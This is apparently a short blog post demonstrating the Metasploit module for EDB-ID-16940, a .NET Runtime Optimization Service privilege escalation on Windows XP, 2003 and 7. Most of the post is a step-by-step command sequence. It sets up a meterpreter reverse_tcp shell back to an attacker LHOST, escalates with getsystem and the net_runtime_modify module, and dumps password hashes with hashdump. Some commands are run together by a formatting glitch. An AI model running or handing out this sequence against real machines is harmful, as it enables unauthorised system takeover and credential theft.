aka wow on ZATAZ.com
EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
Timeline :
Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08
PoC provided by :
XenoMuta
David Rude
Reference(s) :
Affected version(s) :
Microsoft .NET Framework include 4.0 and 2.0
Tested on Windows XP SP3 with :
With Microsoft.NET Framework v2.0.50727 mscorsvw.exe
Description :
This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
backgrounduse post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploitsessions -i 2
getuid
hashdump
I recommend you to read these related posts
- MS10-042 : Microsoft Windows Help Center XSS and Command Execution
- MS08-067 : Microsoft Server Service Relative Path Stack Corruption
- MS10-046 : Microsoft Windows Shell LNK Execution
- MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow
- Microsoft WMI Administration Tools ActiveX Buffer Overflow
- MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability
- MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo
- MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo
- MS10-046 : Microsoft Windows Shell LNK Execution
- CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo
